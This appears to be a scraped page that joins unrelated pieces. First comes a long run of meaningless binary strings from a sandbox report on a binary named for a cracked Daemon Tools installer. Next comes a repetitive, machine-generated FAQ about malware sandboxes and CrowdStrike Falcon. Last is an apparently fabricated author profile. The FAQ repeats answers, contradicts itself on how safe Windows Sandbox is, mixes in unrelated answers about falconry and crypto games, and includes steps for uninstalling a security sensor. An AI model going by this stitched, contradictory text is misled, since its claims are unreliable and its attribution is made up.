XXVSVSMM866633,,,+,,+++,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xxwwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xxwxwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x|}HDyyDAAD?A@?A@?@@??@??@AC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X}i_a03]vxK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X~?gSkz]y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y z=P\,J#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y%HvdH!JJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y&xMK[-%$z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y+@OYq2`L^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y.j46!Au-|\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y.ytj\qj=;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y6s`H\"x0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y\A`o$&fA/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y_jy^2;<7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YAj?G\kgC>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yC"zf<yw{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yc&wTYmAC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yC6{LGUz!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YDIv3Bv}M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yJyCJACA@BA@@@@?@@?@@@AC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YL6--KKKOOMPWPboej

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Yl`'o8Ymv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YP]S'\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Yq1zv|No+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yql'[J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YRR77NNKTYM^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yul9%V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ywV/6MqpjH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yX(Ywci+5@:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yzQg"!LRle

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y~{yIzzCCCCBCBBBB@@%@@BC~%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z,u7_K+H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z!Y4$:HWPb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z/W'I$ U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z;\hzcH_`K

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z=M7[=Uk_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z?!uU"]^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z_Pt1C'{9=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zB8$JQM%mv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zD.y4ZcDS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZDUe6P|o8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zF#&vjb-J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZH4nEN[Lm5=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZI?xpC}#1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zICIIIIzzIz~~y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zIwIIIIIIIIIIy~y~~}~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zIwwIwzwzzzzz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Zl@#^ldPR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zqav9fZ2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZR+K#r.Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZrWrKKtDm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZW c2>JXR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zwwwwwwvuuuuuww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zwwwwwwwwzzzzz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zwwwwzwIzzzzzz~{~~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zzICIwCIzIIzzy~~~|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zz{{z{{CCwCCuuBBuBBuuCw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z~FVn.V<RJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{~O>r9"Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{#G]pEUDJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{%.0Wl2~JX|zf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{'-MefPLC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{0nAO4="Ah4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{3Lv@9VL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{;T,emk-(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{=qqw}?!3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{>kGj}uir

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{`8%lmEeJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{aC5.)@8#9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{be03D. _

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{D,Y6 JQz;u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{MBN<CA'T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{Qxc[gKCRVX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{U{yTR<s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{vNLT)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|,i\8q2TMz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|<>/":

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|>3fA,?y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|>w> 0QgaG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|Ae\pxw?6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|CDBB%Ce:=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|epFw\_g.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|JEEEEEEHHG|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

||~XS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}'>^"i,oF={

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}(*O{N0 _G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}@5SRGN;TH-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}\q+VLyiy0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}^5~uI(#{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}Dwtu\u.?x)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}LVj,7HT}*L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}w3ua`5%g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}Xp1"KZ=N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}ZQbmHa[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}{Fd=bNs!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}|?F&L;;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}||}y|yJJJJAJAA@@@@??????@@}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}~{yyzyJCCAACC@BB@@B @B@A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~ 0*P~;S~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~,$#[05

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~,6_8%p4k'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~7J:K=}E,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~9a:*$y(#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~\!R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~d1p,PxcU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~fc_Cl,$!#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~K%8`OR^`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~nsu.tmp

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~p^M|&sCLw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~Szl%,fj)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~v:|z;NFY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~xxxrZZZ`...M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~yyzIICICCCBCBBBBBBBBBBBC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~~'XC3k&4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FAQs

Free Automated Malware Analysis Service - powered by Falcon Sandbox? ›

Take Falcon Sandbox for a test drive

The No. 1 online malware analysis community is powered by Falcon Sandbox - which means it's field tested by thousands of users every day. Try it for free at Hybrid-Analysis, if you like what you see, you can easily upgrade to a full Falcon Sandbox license.

Is Falcon sandbox free? ›

Take Falcon Sandbox for a test drive

The No. 1 online malware analysis community is powered by Falcon Sandbox - which means it's field tested by thousands of users every day. Try it for free at Hybrid-Analysis, if you like what you see, you can easily upgrade to a full Falcon Sandbox license.

What is a free malware sandbox? ›

Automated malware analysis tools, such as analysis sandboxes, save time and help with triage during incident response and forensic investigations. They provide an overview of the specimen's capabilities, so that analysts can decide where to focus their follow-up efforts.

Is Joe sandbox free? ›

The free version of Joe Sandbox enables users to send files, browse a URL, download and execute a file or submit a command line. It works for Windows operating systems, MacOS, Android, Linux and iOS, making it a complete solution for customers with a large variety of operating systems in their IT infrastructure.

What is CrowdStrike Falcon sandbox? ›

CrowdStrike Falcon® Sandbox is an automated malware analysis solution that empowers security teams by overlaying comprehensive threat intelligence with the results of the world's most powerful sandbox solution.

Is using sandbox safe? ›

Sandboxes are used to safely execute suspicious code without risking harm to the host device or network. Using a sandbox for advanced malware detection provides another layer of protection against new security threats—zero-day (previously unseen) malware and stealthy attacks, in particular.

Is CrowdStrike Falcon free? ›

You'll have 15 days to try CrowdStrike Falcon free. Complete these three steps to get your trial started the right way. This is the first and most important step of the trial. Once the Falcon sensor is installed, your systems are officially protected.

Is sandbox free or paid? ›

A sandbox is a free space that you can use to see if cloud.gov might suit your team's needs. From the setup process through deploying an app, it works similarly to other spaces that are included in paid access packages, with some limitations.

What is the charge to sandbox software? ›

How much are the processing fees? When using online payments through Sandbox, there are no monthly or hidden fees to worry about. We use Stripe as our merchant and the fees for credit cards are 2.9% + $0.30 per transaction and ACH (only available in US) is $0.60 per transaction.

What is sandbox malware? ›

A malware sandbox is a virtual environment where malware can be safely executed and analyzed without causing harm to the host system. It is an essential tool for cybersecurity professionals to understand the behavior of malware and develop effective defenses against it.

How much is CrowdStrike Falcon sandbox? ›

How much does Crowdstrike Cost? Crowdstrike Falcon sandbox price starts at $6,000 (private cloud) – 250 files per month). Crowdstrike Discover pricing (SAAS based) starts at $28.

How much is CrowdStrike Falcon malware? ›

CrowdStrike Falcon Pricing Overview

CrowdStrike Falcon has 3 pricing edition(s), from $6.99 to $17.99. A free trial of CrowdStrike Falcon is also available.

How do I get rid of CrowdStrike Falcon? ›

Uninstall from Control Panel
  1. Open the Windows Control Panel.
  2. Click Uninstall a Program.
  3. Choose CrowdStrike Windows Sensor and uninstall it.

Can Windows sandbox get a virus? ›

Using a sandbox can protect your machine from malware. If you were to run a piece of ransomware in a sandbox, the files inside the sandbox would probably be encrypted but your primary operating system would remain untouched.

What is the purpose of sandbox? ›

A sandbox is an isolated testing environment that enables users to run programs or open files without affecting the application, system or platform on which they run. Software developers use sandboxes to test new programming code.

What are the benefits of malware sandbox? ›

In summary, a malware sandbox can increase email security, help analyse programs, enable quick response to zero-day attacks, and strengthen threat-based security. Ultimately, it can help reduce the cost of potential data breaches, or prevent them entirely.

Can sandbox stop virus? ›

Sandboxes are sometimes used to safely execute malware to avoid causing harm to the host computer, the connection, or other associated devices. Using a sandbox to find vulnerabilities adds an extra defense against security risks, including stealthy breaches and exploits that take advantage of zero-day security flaws.

What is sandbox detected? ›

The term Sandbox Detection refers to a variety of evasion techniques that malware uses to determine whether or not it is being identified and executed within a sandbox.

Is Windows sandbox 100% safe? ›

The software or applications that you install inside the Windows sandbox environment remain "sandboxed", and they all run separately from the host machine. So whatever happens in the sandbox remains there, and your host machine stays 100% safe.

Does CrowdStrike track you? ›

CrowdStrike cybersecurity platform

It also monitors network connections to detect patterns that indicate malicious activity. While tracking these connections and basic data about your computer's operating system and active users, CrowdStrike does not inspect the contents of documents and other data being transmitted.

Is CrowdStrike Falcon a virus? ›

CrowdStrike is a web/cloud based anti-virus which uses very little storage space on your machine. CrowdStrike installs a lightweight sensor on your machine that is less than 5MB and is completely invisible to the end user.

Does CrowdStrike remove malware? ›

Prevent and Detect Malware with CrowdStrike

Combines innovative AI/ML technology with intelligence to rapidly identify and prevent malware.

What can you do in The Sandbox for free? ›

Aside from VoxEdit, The Sandbox has free software GameMaker. This software can be used to make games or other interactive installations. To make these, creators can use non-fungible tokens (NFTs) made with VoxEdit. Once the game installation is complete, all used assets are saved into one ERC-1155 non-fungible token.

How to earn free sandbox? ›

Earning $SAND
  1. Create and Sell Voxel ASSETs on The Sandbox Marketplace. Voxel artists can create ASSETs using The Sandbox's voxel art program, VoxEdit. ...
  2. Create, Share and Monetise Experiences on LAND. ...
  3. Renting out your LAND. ...
  4. Pranksy NFT Boxes.

How do I get a free sandbox subscription? ›

Go to Microsoft Learn portal. Search for an article which involves an exercise e.g. Exercise - Create an Azure Function with triggers / Exercise - Create a timer trigger. Notice there is an option to Sign in to activate sandbox.

Why are sandboxes so expensive? ›

Full Copy sandboxes can be expensive (~25% to 30% of total license per org) because they are complete replicas of the production org, and are reserved for performance testing, load testing, and staging.

How much does it cost to install a sandbox? ›

Building a Sandbox: Cost Factors. According to This Old House, you can make a very basic sandbox for about $200. The final cost depends on the materials you choose, the size of the sandbox and how much sand you'll need to fill it.

Which antivirus has sandbox? ›

Kaspersky sandbox

A sandbox is also a part of the Kaspersky Anti-Targeted Attack Platform and the Kaspersky Threat Intelligence platform.

Is virus scanner same as sandbox? ›

A little simplified: An AV is a piece of software that can (among other things?) scan your system to identify and attempt to isolate and remove threats like viruses or other malware. A sandbox on the other hand, is basically a context in which a piece of software can be run isolated from the rest of the world.

Does Windows 10 have a sandbox? ›

The Windows Sandbox is a temporary virtual machine built into Windows 10 and Windows 11 that allows you to run software without it affecting the rest of your system.

What is the difference between Falcon and CrowdStrike? ›

Falcon is the CrowdStrike platform purpose-built to stop breaches via a unified set of cloud-delivered technologies that prevent all types of attacks — including malware and much more.

Is CrowdStrike Falcon a good antivirus? ›

Crowdstrike Falcon is one of the best endpoint monitoring solution or we can say it is a perfect choice if any organization need an endpoint detection and response EDR solution.

Who uses CrowdStrike Falcon? ›

Companies Currently Using CrowdStrike Falcon
Company NameWebsitePhone
Marriott Internationalmarriott.com(301) 380-3000
ISO New England Inc.iso-ne.com(877) 476-6322
Trinity Healthtrinity-health.org(734) 343-1000
TheGuarantorstheguarantors.com(212) 266-0020
2 more rows

Does CrowdStrike scan for malware? ›

No. CrowdStrike does not scan the contents of data files, websites, email messages, IM/Chat communications and does not perform keystroke logging. Crowdstrike does identify malicious use of legitimate programs by analyzing executable files, scripts, and the context within which these files and scripts are used.

What is the benefit of CrowdStrike Falcon? ›

Why CrowdStrike?
  • Cloud native. Eliminates complexity and simplifies deployment to drive down operational costs.
  • AI powered. Harnesses the power of big data and artificial intelligence to empower your team with instant visibility.
  • Single agent.

Is CrowdStrike a vulnerability scanner? ›

CrowdStrike Falcon® Spotlight utilizes scanless vulnerability assessment technology, delivering always-on, automated vulnerability management that prioritizes risks in real time.

Can CrowdStrike delete files? ›

In conjunction with the ability to kill a process, we can also remove files and directories from the file system.

How do I disable Falcon on Windows? ›

Falcon Uninstall Workflow with Protection Enabled

Navigate to Host App > Host Management, then select the host of interest and click “Reveal maintenance token” and you are presented with the one-time maintenance token, which can be given to the end-user/technician updating or uninstalling the Falcon Agent.

Does CrowdStrike disable Windows Defender? ›

Crowdstrike falcon sensor does not disable Windows Defender.

Is The Sandbox crypto free? ›

Playing The Sandbox is free.

How much is Falcon app? ›

CrowdStrike Falcon Pricing Overview

CrowdStrike Falcon has 3 pricing edition(s), from $6.99 to $17.99.

Is Windows 10 sandbox free? ›

Sandboxie

Sandboxie remains one of the most popular sandbox programs for Windows. One of the best things about Sandboxie is the price point; it's free! Furthermore, it is lightweight and comes with a host of advanced features.

Is CrowdStrike available for personal use? ›

The user will download the installer via the link provided and execute it on their home Windows PC. Upon doing so: The user will be prompted with a checkbox to accept the CrowdStrike Falcon® Prevent for Home Use Terms of Use and privacy notice. The user will be prompted to enter their unique verification code.

What is the point of Sandbox? ›

A sandbox is an isolated testing environment that enables users to run programs or open files without affecting the application, system or platform on which they run. Software developers use sandboxes to test new programming code.

Is Sandbox free or paid? ›

A sandbox is a free space that you can use to see if cloud.gov might suit your team's needs. From the setup process through deploying an app, it works similarly to other spaces that are included in paid access packages, with some limitations.

Does The Sandbox cost money? ›

SPECIAL PRICE - GET THE FULL VERSION FOR $4.99 USD INSTEAD OF $9.99!

What is Falcon used for? ›

Humans have used falcons for hunting for thousands of years. You may have seen artistic depictions of falconry, the art of training and using falcons to hunt small animals and birds, from the Middle Ages or the Renaissance.

What is Falcon app used for? ›

About Falcon

The application helps network administrators monitor malicious activities, apply mitigation techniques and block data tampering across multiple devices. System engineers can use the solution to detect unauthorized access in real-time, review and categorize hackers under blacklist or whitelist.

What data does Falcon collect? ›

CrowdStrike Falcon looks for suspicious processes and programs. To do this, it records details about who has logged in on a machine, what programs are run, and the names of files that are read or written. For example, if you log in and open a Microsoft Word document called “example.

Which browser has sandboxing capabilities? ›

To protect your computer against any malicious activity, Firefox runs any kind of untrusted code in a sandbox. Firefox runs the code in two parts i.e. the Parent and the Child processes. While browsing the internet, all the untrusted processes are run in the Firefox sandbox.

Can you install viruses on Windows sandbox? ›

Windows Sandbox has limited malware protection

For example, if you receive a file via email and are unsure that it's safe, you can use Windows Sandbox to test it. However, if the file contains a new virus, you could inadvertently be risking the security of your main system as well as the rest of the network.

What is the difference between a sandbox and a virtual machine? ›

With a virtual machine, the sandbox is isolated from the underlying physical hardware but has access to the installed operating system. Virtualized environment. Usually, a sandbox is on a virtual machine so that it has no access to physical resources but can access virtualized hardware.

Videos

1. A quick review of HYBRID ANALYSIS
(SkyTech Enterprise Solutions)
2. Leveraging Malware Analysis During Incident Response
(CyberPlural )
3. Malware Analysis - Hybrid Analysis for Malware Assessment
(MalwareAnalysisForHedgehogs)
4. The ReadOut: Falcon Long Term Repository
(CrowdStrike)
5. Introduction To Fileless Malware by Juan Araya
(Security BSides Dublin)
6. EMOTET - Interactive Malware Analysis with ANY.RUN
(Hack eXPlorer)
Top Articles
Latest Posts
Article information

Author: Fredrick Kertzmann

Last Updated: 25/01/2023

Views: 6277

Rating: 4.6 / 5 (46 voted)

Reviews: 93% of readers found this page helpful

Author information

Name: Fredrick Kertzmann

Birthday: 2000-04-29

Address: Apt. 203 613 Huels Gateway, Ralphtown, LA 40204

Phone: +2135150832870

Job: Regional Design Producer

Hobby: Nordic skating, Lacemaking, Mountain biking, Rowing, Gardening, Water sports, role-playing games

Introduction: My name is Fredrick Kertzmann, I am a gleaming, encouraging, inexpensive, thankful, tender, quaint, precious person who loves writing and wants to share my knowledge and understanding with you.